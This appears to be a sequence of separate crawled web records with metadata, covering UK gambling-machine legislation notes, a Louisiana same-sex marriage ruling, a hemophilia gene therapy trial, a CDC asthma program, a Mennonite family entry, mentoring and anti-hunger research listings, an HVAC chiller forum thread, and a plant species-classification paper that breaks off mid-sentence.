(e.g. information on minimum age of use); or Any other matter relating to the way that the machine works (e.g. whether it must operate randomly or not). 593.The Secretary of State may also make regulations about the supply, installation, adaptation, maintenance or repair of a gaming machine. 594.The penalty for making a machine available for use, in breach of these regulations, is a maximum term of imprisonment of 51 weeks in England and Wales, or 6 months in Scotland, or a fine up to level 5, or both. 595.Regulatory steps taken by the Commission, and any licence conditions it sets, must not conflict with these regulations. The Secretary of State can also identify matters about which licence conditions cannot be made in relation to machines. The Commission is empowered in Part 5 to set standards for gaming machines under section 96, and regulation of gaming machines is therefore a dual function of both the Secretary of State, and the Commission. Section 242: Making machine available for use 596.The principal offence of making a gaming machine available for use unlawfully is set out in this section. A person will commit an offence if he makes any gaming machine available for use unless: He holds an operating licence which permits such use; He holds a family entertainment centre permit; He holds a club gaming permit or a club machine permit under Part 12; He has appropriate permission for alcohol licensed premises under Part 12; He makes gaming machines available at a travelling fair as permitted by Part 12, or; The machine offers no, or a limited, prize (as defined in this Part). 597.Under Part 3 of the Act it is a separate offence for a person to use premises for making a gaming machine available for use without the necessary authorisation or exemption, such as a premises licence or a Category D gaming machine permit. It will also be an offence under this section to make a gaming machine available for use if the machine does not comply with regulations made by the Secretary of State under section 240. 598.The penalty for this offence is a maximum term of imprisonment of 51 weeks in England and Wales, or 6 months in Scotland, and/or a fine up to level 5. Section 243: Manufacture, supply etc. 599.As well as setting requirements about the use of machines, the Act stipulates that various activities concerning the manufacture or supply of a gaming machine must also be regulated by the Commission. Under Part 5 of the Act, gaming machine technical operating licences are available for those wishing to manufacture, supply, install, adapt, maintain or repair a gaming machine. Failure to hold such an operating licence, when undertaking any of these activities, is an offence under this section. The penalty is a maximum term of imprisonment of 51 weeks in England and Wales, or 6 months in Scotland, and/or a fine up to level 5. 600.Exceptions from this offence exist: for those holding a single machine supply and maintenance permit under this Part; for machines exempted by regulations under section 248(2) (no prize); where the activities relate to a gaming machine that is for scrap; or where the supply is incidental to the sale or letting of a property. 601.This means that no operating licence is required where a machine is being broken up and no further use is made of it for gaming machine purposes, and where the machines are ancillary to the sale of a business which uses gaming machines. Any use, after sale, will continue to be subject to the other requirements of the Act. Section 244: Linked machines 602.It is an offence, under this section, for gaming machines to be linked so that they operate together, and the value of the prize available on one machine is determined to any extent by use of the other machine. There is one exception to this, which is that subsection (2) permits machines to be linked at licensed casino premises provided that all of the machines are situated on the same premises. Linkage of gaming machines in this way does not authorise casino licensees to offer maximum prizes in excess of those allowed for the category of machine being used. 603.No linking between licensed casino premises is permitted, but subsection (3) gives the Secretary of State power to lift this prohibition, subject to appropriate Parliamentary approval. 604.The penalty, upon conviction for this offence, is a maximum term of imprisonment of 51 weeks in England and Wales, or 6 months in Scotland, or a fine up to level 5, or both. Section 245: Credit 605.It is an offence for a person to supply, install or make available a gaming machine which allows payment to be made by means of a credit card. The penalty, upon conviction for this offence, is a maximum term of imprisonment of 51 weeks in England and Wales, or 6 months in Scotland, or a fine up to level 5, or both. Section 247: Family entertainment centre permits 606.Family entertainment centre (“FEC”) gaming machine permits allow certain gaming machines to be made available for use without an operating or premises licence. These permits are issued by licensing authorities using the procedure set out in Schedule 10. They relate to the lowest category of machine. If an FEC wished to use Category C and D machines, it would require an appropriate operating and premises licence, under Parts 5 and 8 of the Act. The permits provided for here only relate to Category D machines. 607.Only premises which are wholly or mainly used for making gaming machines available for use may hold an FEC gaming machine permit. This is a change from the position prior to the Act, when any premises could apply for a permit allowing them to use an “amusements with prizes” gaming machine (the nearest equivalent to a Category D machine). The intention is that gaming machines in certain non-gambling premises, like those now sometimes located in fish and chip shops and taxi cab ranks, should be removed. Once these provisions are commenced, permits previously granted under Schedule 9 to the Gaming Act 1968 will no longer be available under the Act, except to the extent that they relate to premises wholly or mainly used for making gaming machines available for use. Transitional provisions, under Part 18, will give effect to this change, and allow existing permits to continue after the repeal of the relevant provisions of the 1968 Act, until the date on which they would otherwise have expired if those provisions had continued in force. The position of premises holding an alcohol licence is dealt with separately in Part 12.
<urn:uuid:da9adff0-694c-48ee-b1d6-b99ffbf72bfc>
CC-MAIN-2016-44
http://www.legislation.gov.uk/ukpga/2005/19/notes/division/5/3/10/30
s3://commoncrawl/crawl-data/CC-MAIN-2016-44/segments/1476988719215.16/warc/CC-MAIN-20161020183839-00200-ip-10-171-6-4.ec2.internal.warc.gz
en
0.939914
4,145
1.804688
2
LAFAYETTE — A state judge who ruled Monday that Louisiana’s ban on same-sex marriage is unconstitutional likened the law to segregation-era prohibitions on interracial couples. “Just a few decades ago in these United States, miscegenation was illegal. It is now something that most Americans in today’s society hardly even debate,” District Judge Edward Rubin, who is black, wrote in a ruling unsealed Tuesday. Rubin’s decision came Monday in an adoption case involving two women in Lafayette but had been sealed from public view pending a redaction to remove the name of their minor son. The ruling by the 15th Judicial District Court judge in Lafayette will have no immediate impact on the status of same-sex marriages in Louisiana, and the state Attorney General’s Office is appealing the decision to the Louisiana Supreme Court. Supporters of same-sex marriage have hailed the decision as a moral and legal victory in the ongoing battle over an issue that could soon be settled by the U.S. Supreme Court. Rubin’s decision offers an opposing judicial view in Louisiana to a ruling earlier this month by U.S. District Judge Martin Feldman, in a case out of New Orleans, upholding the state ban. The federal judge’s ruling went against the trend of federal judges in other states striking down similar bans. Most of Rubin’s 23-page ruling in the Lafayette case is a standard review of the procedural history of the adoption proceedings and past legal rulings in state and federal courts on the issue of same-sex marriage. But in the final pages of his decision, the judge compared laws against same-sex marriage to old bans on interracial marriage that the U.S. Supreme Court has long since struck down. Rubin predicted views on same-sex marriage will shift much like views have changed on interracial marriage. “Lest we forget, there was a time in America’s history when gays and lesbians were not permitted to even associate in public,” Rubin wrote. “We are past that now, but when it comes to marriage between persons of the same sex, this nation is moving towards acceptance that years ago would have never been contemplated.” Gene Mills, president of the conservative Louisiana Family Forum, characterized Rubin’s comparison to interracial marriage bans as “personal opinion” not supported by past legal cases dealing with same-sex marriage. “I think this decision is a minor legal aberration from an activist judge that will be corrected by the state Supreme Court,” Mills said. The Forum for Equality Louisiana, which led the recent challenge to Louisiana’s same-sex marriage ban in federal court in New Orleans, praised Rubin’s ruling and in particular his references to Loving v. Virginia, the 1967 U.S. Supreme Court case that struck down laws banning interracial marriages. The case is often cited in arguments against bans on same-sex marriage. “This court does not believe that the historical background of Loving is so different from the historical background underlying states’ bans on same-sex marriage,” Rubin wrote. “One cannot look at Loving without recognizing that it was about racism as well as a couple’s decision to assert their right to choose whom to marry.” Rubin’s ruling came in an adoption case involving Angela Costanza and Chasity Brewer, who were legally married in California in 2008 and now live in Lafayette. Costanza sought to be legally recognized as a parent to Brewer’s son, which raised the issue of the validity under Louisiana law of their out-of-state marriage. Rubin found Louisiana’s ban on same-sex marriage violated the due process and equal protection clauses of the 14th Amendment and the U.S. Constitution’s “full faith and credit clause,” which calls for each state to recognize the laws and court decisions of other states. The judge also declared unconstitutional a state Department of Revenue policy that barred same-sex couples from filing joint state tax returns. The state will ask Rubin to suspend his ruling pending an appeal to the Louisiana Supreme Court, said attorney Kyle Duncan, who has been hired by the state Attorney General’s Office to handle challenges to Louisiana’s same-sex marriage ban. “We expect our stay motion to be granted, which will mean that the judgment cannot be executed during our appeal to the Louisiana Supreme Court,” Duncan said in an email Tuesday.
<urn:uuid:e15a25f4-d678-4534-8065-2fa0c1fe055d>
CC-MAIN-2017-04
http://www.theadvocate.com/acadiana/news/article_c3368e82-d18f-569b-98d0-2e6ff0639082.html
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280221.47/warc/CC-MAIN-20170116095120-00230-ip-10-171-10-70.ec2.internal.warc.gz
en
0.963148
941
1.929688
2
This post originally appeared on CNN Health. A one-time novel gene therapy can reduce the risk of excessive bleeding in people with the bleeding disorder hemophilia B, who typically would need repeat therapies to reduce their risk, according to results from a Phase 1-2 trial. Administration of the gene therapy on a single occasion was found to support the production of the missing blood clotting protein called factor IX in nine of 10 people who got various dose levels of the infusion therapy, according to findings published Thursday in the New England Journal of Medicine. The therapy, called FLT180a, works by delivering a supercharged variant of factor IX using a dead, inactive virus as the carrier or vector. “Our results confirm that gene therapy with FLT180a can result in factor IX levels in the normal range with relatively low vector doses,” wrote the researchers from University College London, the Royal Free Hospital and biotechnology company Freeline Therapeutics. The trial was funded by Freeline Therapeutics. Hemophilia B is a rare hereditary disorder caused by mutations in the gene that encodes for factor IX, leading to a lack of this protein and higher risk of excessive bleeding. The standard care for severe hemophilia B is lifelong intravenous infusions of factor IX concentrate, sometimes weekly or even more frequently. “Removing the need for haemophilia patients to regularly inject themselves with the missing protein is an important step in improving their quality of life,” Dr. Pratima Chowdary, a professor of hemophilia at University College London and lead author of the study, said in a news release. Searching for ‘the sweet spot’ The researchers, based in the United Kingdom, monitored 10 men with moderately severe or severe hemophilia B for 26 weeks to assess the safety and efficacy of the therapy and determine an appropriate dosage. Too high of a dose could cause blood clotting; too low could fail to adequately treat the hemophilia condition. From December 2017 through March 2020, the men got a single intravenous infusion of FLT180a at one of four dose levels. The researchers measured the efficacy of the therapy by evaluating factor IX levels over time, and they found that after FLT180a infusions, all of the men had increases in their factor IX levels, ranging from 7% to 280%, by 26 weeks. Factor IX activity was sustained over 27 months in all but one participant. “Above 40% or so of normal factor IX level is considered normal,” said Dr. Nigel Key, chief of the section of classical hematology and director of the UNC Hemophilia and Thrombosis Center at the University of North Carolina at Chapel Hill, who was not involved in the study. People who have 5% to 30% of the normal amount of clotting factors in their blood typically are considered to have mild hemophilia. In the FLT180a trial, four patients achieved levels that were higher than 100%, five were between 44% and 53%, and one was at 7%. The man with factor IX levels of 280% was one of two participants to get the highest dosage and had a serious adverse event of arteriovenous fistula thrombosis, a type of blood clotting. “While proving that very high levels of FIX are achievable with this approach, it is clear that the optimal dose of the vector has yet to be determined,” according to Key. When the researchers determine a final study protocol for FLT180a, “it’ll be based off these data in terms of hitting the sweet spot,” Key said. “If we can get everyone in the range of 50% and 150% factor IX, that’s the sweet spot.” The men also received immunosuppressive drugs, such as glucocorticoids and tacrolimus, to keep their immune systems from rejecting the therapy. No patients withdrew from the trial because of toxic side effects, and no deaths were reported during the study. Among all side effects, the researchers found that 10% were considered to be associated with the gene therapy and 24% with the immunosuppression. The research team continues to evaluate the therapy. “Our trial results support further evaluation of FLT180a in clinical trials to confirm the dose and immunosuppressive regimen that are necessary for the maintenance of adequate hemostasis in patients with hemophilia B,” the researchers wrote. ‘There’s more work to be done’ The study is a Phase 1-2 trial that included only 10 participants. “Seeing the results in the same detail of a Phase 3 study will be important in terms of really understanding the impact,” said Dr. Christine Kempton, a professor at the Emory University School of Medicine who leads the clinical care team at the Hemophilia of Georgia Center for Bleeding & Clotting Disorders of Emory. She was not involved in the current study. Additionally, FLT180a is not the only gene therapy being investigated for hemophilia. This type of therapy has been studied “for a while,” Kempton said. “The success of gene therapy and some of the challenges that it pose has been part of our discussions for several years now,” she said. “For hemophilia B, there are other clinical trials that have produced positive results,” she said. “And there are other results in the hemophilia A space as well – other Phase 1-2 studies that have been reported. I think the overall message is that these are exciting advances, and there’s more work to be done.” This post originally appeared on CNN Health.
<urn:uuid:63e354b4-6e09-4c74-b5d6-d60d3b58c73d>
CC-MAIN-2022-33
https://thechronicpainchronicle.com/gene-therapy-reduced-risk-of-excessive-bleeding-for-people-with-hemophilia-b-early-trial-data-suggests/
s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882572408.31/warc/CC-MAIN-20220816151008-20220816181008-00679.warc.gz
en
0.961397
1,208
3.25
3
YES WE CAN Children’s Asthma Program This case study was prepared for CDC by Dr. LaMar Palmer of MAS Consultants. The purpose of the case study is to share the experience of one community as they attempt to address the problem of asthma. It does not represent an endorsement of this approach by CDC. YES WE CAN Children’s Asthma Program: Intervention Research Outcomes Dr. Shannon Thyne, the Medical and Research Director of the Pediatric Asthma Clinic at San Francisco General Hospital, is in charge of the research efforts to determine the health outcomes resulting from the YES WE CAN asthma program. Dr. Thyne characterizes YES WE CAN as a "reality-based" response to the asthma epidemic in San Francisco. One reality, she explains, is that physicians are often poor at communicating and in implementing the NAEPP guidelines. The second reality is that asthma care for poor, inner-city children is substandard. Finally, most children who have asthma and their families are not taught how to manage the disease. Dr. Thyne is a strong advocate for the patient education and training conducted in the clinic by the asthma team that is reinforced in the homes by the CHW. "Education and training supports the all important self-management element needed to sustain improvements in the child’s asthma symptoms and reduce morbidity" according to Dr. Thyne. A pre- and post- intervention methodology has been used to measure health outcomes and evaluate the YES WE CAN asthma program efficacy. The asthma outcomes shown in Tables 4 and Tables 5 are from children treated in the San Francisco General Hospital asthma clinic between 1999 and 2003. Health outcome data for children treated between 2001 and 2003 are also available from the YES WE CAN asthma clinic at the Mission Neighborhood Heath Center (Table 6). - Page last reviewed: April 24, 2009 - Page last updated: April 27, 2009 - Content source:
<urn:uuid:f72a07f1-b4fd-4d41-b1b1-b8100de52436>
CC-MAIN-2017-04
https://www.cdc.gov/asthma/interventions/yes_we_can_outcomes.htm
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281746.82/warc/CC-MAIN-20170116095121-00282-ip-10-171-10-70.ec2.internal.warc.gz
en
0.950612
390
2.375
2
De Mepsche was a noble family of governors in the Dutch province of Groningen. Whereas most of them, and particularly Johan de Mepsche, in the 16th century were ardent Catholics and devoted servants of the Spanish regime of the Duke of Alba, which was persecuting the Anabaptists and Mennonites, a cousin, also named Johan de Mepsche, of Den Ham, joined the Mennonites about 1580, and leaving his country, his property, and his social rank for his faith he fled to Danzig, Prussia. He is said to have died of the plague at Danzig in 1588. The hypothesis that he may have been the ancestor of the Mennonite Hamm family in Prussia is probably tenable. Doopsgezinde Bijdragen (1906): 35, 44. Mennonitishe Geschichtsblätter 8 (1951): 33. |Author(s)||Nanne van der Zijpp| Cite This Article van der Zijpp, Nanne. "Mepsche, de." Global Anabaptist Mennonite Encyclopedia Online. 1957. Web. 17 Jan 2017. http://gameo.org/index.php?title=Mepsche,_de&oldid=89854. van der Zijpp, Nanne. (1957). Mepsche, de. Global Anabaptist Mennonite Encyclopedia Online. Retrieved 17 January 2017, from http://gameo.org/index.php?title=Mepsche,_de&oldid=89854. ©1996-2017 by the Global Anabaptist Mennonite Encyclopedia Online. All rights reserved.
<urn:uuid:271c13b5-ccf1-475e-beb9-dae86aabbe2c>
CC-MAIN-2017-04
http://gameo.org/index.php?title=Mepsche,_de&stableid=89854
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279650.31/warc/CC-MAIN-20170116095119-00429-ip-10-171-10-70.ec2.internal.warc.gz
en
0.858795
368
2.359375
2
ERIC Number: ED318931 Record Type: RIE Publication Date: 1990-Feb Reference Count: 0 Mentoring Programs for At-Risk Youth: A Dropout Prevention Research Report. This document provides an overview of the concept of mentoring, this time applied to the area of dropout prevention. It begins by describing the functions and characteristics of a mentor, considering the use of mentors with at-risk youth, and examining the roles of a mentor in dropout prevention. Suggestions are given for setting up a mentoring program. Program summaries are included for 15 successful mentoring programs based in schools, universities, private organizations and community groups, states, and businesses. Twelve steps for starting a mentoring program are listed and discussed: (1) establish program need; (2) secure school district commitment; (3) identify and select program staff; (4) refine program goals and objectives; (5) develop activities and procedures; (6) identify students in need of mentors; (7) promote program and recruit members; (8) train mentors and students; (9) manage mentor and student matching process; (10) monitor mentoring process; (11) evaluate ongoing and terminated cases; and (12) revise program and recycle steps. A reading and reference list is included and organization and program information is provided. Appendices contain sample forms that can be used as guides in developing and evaluating mentoring programs. (NB) Publication Type: Reports - Descriptive Education Level: N/A Authoring Institution: National Dropout Prevention Center, Clemson, SC. IES Cited: ED502502
<urn:uuid:b2e02e2f-0fe3-460f-84c8-f31d868ce626>
CC-MAIN-2017-04
https://eric.ed.gov/?id=ED318931
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280761.39/warc/CC-MAIN-20170116095120-00092-ip-10-171-10-70.ec2.internal.warc.gz
en
0.883178
342
2.796875
3
The challenges inherent in supporting the self-help efforts of the chronically hungry poor require innovation to achieve greater scale, impact and sustainability. Freedom from Hunger has always been committed to innovation backed up by rigorous research. Our research staff and collaborators put our innovations, and those of other organizations, to the test, employing a wide range of methodologies to ensure that they are supported by evidence from the field. We are pleased to provide our research reports to all who are interested in evidence-based innovation. Generally, these reports have also been published in part in technical journals and other publications, but seldom are the complete research reports accepted for publication. Therefore, we make our full research reports, as well as summaries, freely downloadable in PDF format. These reports provide the full details of the research projects—social and institutional context, objectives, design and implementation of the innovation being tested, research design, methods, analysis, results, discussion in light of relevant literature and conclusions. The reports are listed below in chronological order, starting with the most recent reports. Most Freedom from Hunger reports have been translated into French and/or Spanish for the benefit of the in-country institutions with which we have partnered to develop and test these innovations. In the absence of full translations, summaries in French and/or Spanish are usually available. We sincerely hope you will find these research reports useful for broadening your understanding of value-added microfinance and related innovations. Gray, Bobbi with Cassie Chandler, Megan Gash, Chris Dunford, Byron Hoy, Kelly Taylor, William Roberts, Paul Ream, Sara Maldonado, Lauren Brunner. Freedom from Hunger: Davis, CA. (Feb. 2013) Listening to the poor without preconceptions has generated remarkable insights about their desires, challenges and capabilities, with significant implications for designing programs that more effectively meet their needs. To complement these efforts and the learning they have generated, Freedom from Hunger undertook a project to listen to the frontline fieldworkers; specifically, to listen to the credit officers of financial service providers who utilize the village-banking model as a platform to provide financial and non-financial services to groups of poor women. Freedom from Hunger worked with five microfinance institutions to conduct this research. Almost 200 interviews and focus-group discussions were conducted with credit officers, clients and supervisors to answer five key questions: 1) What motivates credit officers? 2) What is the state of the relationship between the credit officer and the client? 3) What can we learn from credit officers about the people they serve? 4) How can we better support credit officers? and 5) How faithfully are programs, policies and procedures carried out by credit officers? This report documents the findings for these five questions. Integrated Health and Microfinance: Harnessing the Strengths of Two Sectors to Improve Health and Alleviate Poverty in the Andes. Metcalf, Marcia, Lisa Kuhn Fraioli, Andrea Del Granado from Freedom from Hunger, and Anna Awimbo (Microcredit Summit Campaign). 24pp. (January 2013) Davis, CA: Freedom from Hunger Over the last few decades, microfinance has been considered one of the most important strategies in alleviating poverty and addressing food-security issues. For years, microfinance prviders have recognized that poverty and poor health are so intimately connected that it is virtually impossible to distinguish between the causes of one and the effects of the other. Many microfinance leaders and field agents report that health problems are often given as the reason clients fail to repay loans or build and sustain successful income-generating activities. In recent years, we have begun to see how the microfinance sector is increasingy becoming recognized as an effective platform for providing vital health education, products and services. Leatherman, Sheila and Kimberley Geissler, Department of Health Policy and Management, Gillings School of Global Public Health, University of North Carolina at Chapel Hill, Chapel Hill, NC, USA, Bobbi Gray and Megan Gash. Freedom from Hunger An innovative and scalable approach, health financing by microfinance institutions can expand existing health-financing options for the poor. We examined healthcare-seeking behavior, health costs and health-financing methods among microfinance clients in Bolivia, Benin and Burkina Faso. Health costs and lost productivity were substantial. Clients benefit from assistance, including health savings, health loans and health micro-insurance. Microfinance institutions offer advantages in developing health-financing options: global reach, expertise in loans and savings, and their mission to facilitate household financial stability. Health-financing products hold considerable potential but require careful design to optimize value and minimize risk to clients. Gray,Bobbi, Megan Gash, Scarlett Reeves, Benjamin Crookston. In Thomas L. Wouters (Ed.). "Progress in Economics Research. Volume 20". 22pp. (2011). Hauppage, NY : Nova Science Publishers, Inc. (Read-Only version). Over the past few years, microfinance has been widely heralded as a successful contributor to the alleviation of poverty. Scores of studies have shown the positive impact that microfinance can have on the lives of poor people. However, overall progress has been disappointing. Achievement of poverty alleviation goals will call for new and innovative ways of working rather than more of the same. A strategic, overarching strategy to address poor people's interrelated needs through creative partnerships that build on the best of different development sectors has the potential to lead to exponential rather than incremental reduction of poverty in the developing world. Evidence now supports the integration of microfinance with non-financial services as an approach that has potential for enormous contribution to poverty alleviation. This chapter will focus on the opportunities and challenges for microfinance organizations providing these integrated services. It also will provide supporting evidence that shows promising financial and health benefits of integration for the poor and the institutions that support their self-help efforts. Integrating microfinance and health strategies: examining the evidence to inform policy and practice Sheila Leatherman, Marcia Metcalfe, Kimberley Geissler and Christopher Dunford. 17pp. (February 2011). Chapel Hill, NC : Gillings School of Global Public Health, University of North Carolina and Davis, CA : Freedom from Hunger. Human Faces of Microfinance Impact—What We Can Learn from Freedom from Hunger’s “Impact Story” Methodology Jarrell, Lynne, Bobbi Gray, Megan Gash, Chris Dunford. 42pp. (February 2011). Davis, CA : Freedom from Hunger. Miller, Jaclyn and Megan Gash. Freedom from Hunger Research Paper No. 14. 26pp. (December 2010). Davis, CA : Freedom from Hunger. Leatherman, Sheila, Somen Saha, Megan Gash and Marcia Metcalfe. Freedom from Hunger Research Paper No. 12. 7pp. (December 2010). Davis, Ca : Freedom from Hunger.
<urn:uuid:a4419fad-e6a0-49a1-a92d-2c2861a6275d>
CC-MAIN-2017-04
https://www.freedomfromhunger.org/research-reports?page=3
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282140.72/warc/CC-MAIN-20170116095122-00132-ip-10-171-10-70.ec2.internal.warc.gz
en
0.9316
1,442
1.625
2
if you are waiting to measure approach until you have full load then you are missing a lot of information. chiller is running at 50% RLA and the evaporator approach is at 1F...good or bad? if you can't judge it until the chiller is at full load then you are not giving a clear picture to the customer...btw...good...why? well, we know that approach temperatures go up with load. if the chiller is at 50% and 1F approach, then it will most likely be ok when it loads up to 100%...it may get as high as 4-5F in this case. chiller is running at 50% RLA and the evaporator approach is at 5F...good or bad? since we know that the approach is going to go up when it loads up, then we know that this chiller is going to probably have a 8-10F approach at 100%...this is bad, however, we know this long before the chiller is at 100% and we can take action to prevent this. know how to read your approaches! Don't step on my favorite part of the Constitution just to point out your favorite part. Political Correctness is forced on you because you have forgotten decency. Will be a good post. To discus about the aproach. Due the aproach is defined by the machine design is not the same aproach for a 19xl , 19dh,dk , cvhe etc . From my stand point of view. If you don't have the design sheet of the chiller you only make asumptions . With new and old technology you can load manually to full load the machine , I don't know if any. General rule of the aproach. Under unload . If exist I would like to know where cand find that information. Thanks for share information I approach that remark The evaporator approach will depend on the number of passes through the chiller barrel, the more times the water shoots through the tubes the lower the approach. Typical Trane PCV, CVHA were 2-3 pass evap with a 2 pass cond. If your condenser is clean your condenser approach should only be 2*-4*F, my guess would be fouled tubes with a 15*F condenser approach or as said before a rusted out division plate Once in a while everything falls into place and I am able to move forward, most of the time it just falls all over the place and I can't go anywhere-GEO
<urn:uuid:f7624f60-01e7-44c5-9de9-88a602075cc5>
CC-MAIN-2017-04
http://hvac-talk.com/vbb/showthread.php?1029041-Trane-PCV-side-winder-Surging&p=12741301
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282202.61/warc/CC-MAIN-20170116095122-00549-ip-10-171-10-70.ec2.internal.warc.gz
en
0.952044
534
1.539063
2
- Research article - Open Access Reliable genomic strategies for species classification of plant genetic resources BMC Bioinformatics volume 22, Article number: 173 (2021) To address the need for easy and reliable species classification in plant genetic resources collections, we assessed the potential of five classifiers (Random Forest, Neighbour-Joining, 1-Nearest Neighbour, a conservative variety of 3-Nearest Neighbours and Naive Bayes) We investigated the effects of the number of accessions per species and misclassification rate on classification success, and validated theirs generic value results with three complete datasets. We found the conservative variety of 3-Nearest Neighbours to be the most reliable classifier when varying species representation and misclassification rate. Through the analysis of the three complete datasets, this finding showed generic value. Additionally, we present various options for marker selection for classification taks such as these. Large-scale genomic data are increasingly being produced for genetic resources collections. These data are useful to address species classification issues regarding crop wild relatives, and improve genebank documentation. Implementation of a classification method that can improve the quality of bad datasets without gold standard training data is considered an innovative and efficient method to improve gene bank documentation. The goal of gene banks is to secure genetic resources for research and breeding now and in the future. In 2009, gene banks worldwide maintained an estimated 7.4 million accessions, 1.4 million more than in 1996 . Roughly 30% of this increase is accounted for by the increased interest in crop wild relatives (CWR), which include the progenitors of domesticated crops as well as species closely related to them. The use of crop wild relatives to improve crop yield, pest and disease resistance, and tolerance for biotic and abiotic stress is well established, with important examples dating back more than 60 years . Since the introduction of marker assisted breeding and more advanced technologies, the use of crop wild relatives has only intensified . The increased interest in a broad range of crop wild relatives also necessitates expertise in species identification, as the distribution of misidentified plant materials can have significant adverse effects on the subsequent use. Traditionally, species identification has been the domain of taxonomists, who identify species based on morphological features. This is a time-consuming task, while limited morphological variation may still cause unreliable identifications [4, 5]. In addition to initial misclassifications, gene bank documentation may contain errors due to complicated accession histories involving exchanges among institutions and multiple rounds of regeneration. As a result, mistaken identities in genetic resources collections are not uncommon. Therefore, efficient methods to identify and correct species misclassifications would be very helpful to gene banks. The need for easy and reliable species identification is not restricted to gene banks. It has existed for much longer, in disciplines ranging from ecology to food fraud detection , and gave rise to the conception of DNA barcoding in 2003. DNA barcoding is a taxonomic method that uses variation in the mitochondrial gene cytochrome c oxidase I (cox1) for species identification . Since the first publication, DNA barcoding has received wide support for its straightforward approach and efficacy in both the identification of biological specimens and the discovery of species [8, 9]. However, some criticisms have been levelled at the method as well, directed at its departure from classic taxonomy by using genetic distance measures instead of character based identification, the lack of an objective set of criteria to delineate species when using these distance measures, and whether using only the cox1 gene is really sufficient . Although cox1 has been shown to be successful in identifying species of butterflies, birds, bats, fish, and mosquito [11,12,13,14,15], cox1 shows insufficient variation to distinguish species in various other groups, such as vascular plants, fungi, invertebrates, reptiles and amphibians [16,17,18,19]. An alternative to cox1 in these groups remains elusive, but it is evident that the species resolution of DNA barcoding benefits from including additional loci in the analyses to increase the number of divergent sites [20, 21]. Still, the literature addressing the methodological shortcomings of DNA barcoding is valuable and very informative. The classification performance of many candidate methods has already been analyzed and compared in DNA barcoding, such as such as Neighbour-Joining (NJ), k-Nearest Neighbours (k-NN), Classification and Regression Trees (CART), Random Forest, kernel methods, Naive Bayes classifiers, Repeated Incremental Pruning to Produce Error Reduction (RIPPER) , Support Vector Machines (SVMs), BLOG , and DNA-BAR [24,25,26,27,28]. The overlap of candidate methods between studies, however, is sparse. We selected a variety of methods from a pool of successful candidate methods, and aimed for diversity in methodology. This resulted in the selection of Random Forest, NJ, k-NN (at k = 1 and k = 3), and Naive Bayes. The first three were the most promising methods in the comparison study of Austerlitz et al. , whereas Naive Bayes was one of the best performers in the study of Weitschek et al. . These methods broadly constitute three types of approaches: distance methods (k-NN), phylogenetic methods (NJ), and supervised machine learners (Random Forest, Naive Bayes). In these comparisons, NJ will be representative of the commonly used methodology to correct misclassifications in diverse datasets, as these are currently based on phylogenetic analysis. In this paper, we depart from the single gene approach of DNA barcoding strategies and instead employ SNPs from throughout the genome. This will benefit gene banks in three ways. Firstly, methods will be more generalizable across species as there will be more variation to utilize in species delineation. Secondly, the methods will be applicable to a broader range of genotyping datasets, including non-sequencing methods such as AFLPs. Thirdly, in their criticism of DNA barcoding, many have pointed out that any method relying on a single gene will encounter a problem in detecting and classifying hybrid introgressions [29,30,31], information which will be of interest for germplasm end-users. Although our datasets don’t include enough confirmed hybrid accessions, we expect that genome-wide approaches will be more successful in identifying the major donor species of a hybrid. For the vast majority of crop wild relatives, a verified genomic dataset with which to train classification models is lacking. For a select number of crops, the creation of such a dataset will only be a matter of time, but for most crops the economic incentive is lacking. In the short- and long-term, the genetic resources community would therefore benefit from a classification strategy that does not require a perfectly classified training set, but will instead work with datasets as they are available for genetic resources collections, i.e. mostly verified but misclassifications may be present. If the development of such a strategy is successful, the genomic data that are already available can immediately be used to improve the classification accuracy of the collection. There are a number of difficulties to this development. Firstly, there are multiple dataset characteristics that have been shown to impact classification success in DNA barcoding , such as the number of species, their respective speciation time, and the number of accessions per species. These characteristics will likely also affect our classification models. Supervised learners in particular (e.g. Random Forest and Naïve Bayes) may need more accessions per species to perform well. To test at what point, if any, machine learners are no longer recommended, curated datasets are created to study the effect of the number of accessions per species on the performance of classifiers. Secondly, classification models should be able to learn from bad training data, i.e. training data with misclassifications. To determine which classifiers (if any) are most suited to work with imperfectly classified data, we simulated different misclassification rates. Comparison between the applied misclassification rate and the classification success of classifiers should reveal whether the classifiers succeeded in improving the quality of the dataset. Thirdly, a rather severe imbalance in species representation is found in CWR datasets. Wild relatives that will readily exchange genes of interest with their cultivated counterparts (species belonging to the primary gene pool) are much higher represented in datasets than wild relatives from the secondary and tertiary gene pool, as these datasets are usually generated for breeding purposes. To determine how well our results translate to such datasets, we tested the classifiers on three complete datasets, and used cross-validation on the supervised machine learners to how much of their initial success may be due to over-fitting. The goal of this work is to lay the basis for curators of genetic resources to discover possible misclassifications in genotyped collections, regardless of species, inclusion of wild relatives, or genotyping method. This will improve the quality of collections at minimal cost, and contribute towards making bioinformatics more accessible to genetic resource specialists. Performance on curated datasets To determine if classifiers can improve the quality of a bad training dataset, they were trained on curated Helianthus datasets with varying rates of artificially induced misclassifications. They then classified these curated datasets. To examine the impact of species representation on this process, the number of representatives per species was also varied. Through 5,000 repetitions of artificially induced misclassifications in different curated datasets, the best classifiers for each of these datasets were identified (Table 1). When the species representation exceeded 4, Random Forest was the best classifier. When species representation was lower, Naive Bayes performed markedly better than Random Forest. Overall, 3-NN showed the best performance (median prediction accuracy of 0.94 vs Random Forest’s 0.92). Random Forest and 3-NN have proven themselves adept at improving the quality of a bad dataset, and to provide a significant improvement over NJ, the method that represents the current methodology to address misclassifications. Regardless of the quality of the curated datasets, NJ was outperformed. With more optimal datasets, specifically datasets including 10 accessions per species and a misclassification rate of 6.25%, NJ struggled to improve the quality. Random Forest and 3-NN, by comparison, reduced the misclassification rate in these datasets to a median of 2%. With less optimal datasets, in this case 4 accessions per species and a misclassification rate of 12.50%, 3-NN reduced the misclassification rate to a median of 6%, a marked improvement. In contrast, NJ actually increased the misclassification rate of these datasets and output data with a median misclassification rate of 16%. In all cases, the classifiers showed reduced performance as misclassification rate rose. Yet surprisingly, the misclassification rate appears to have little influence on the best classifier. Exceptions were observed for datasets with 4 or 8 accessions per species, but the difference in prediction accuracy was only minimal in these cases. It is possible that this effect (or lack thereof) is caused by the procedure used to induce misclassifications. Because accessions to misclassify were selected just as 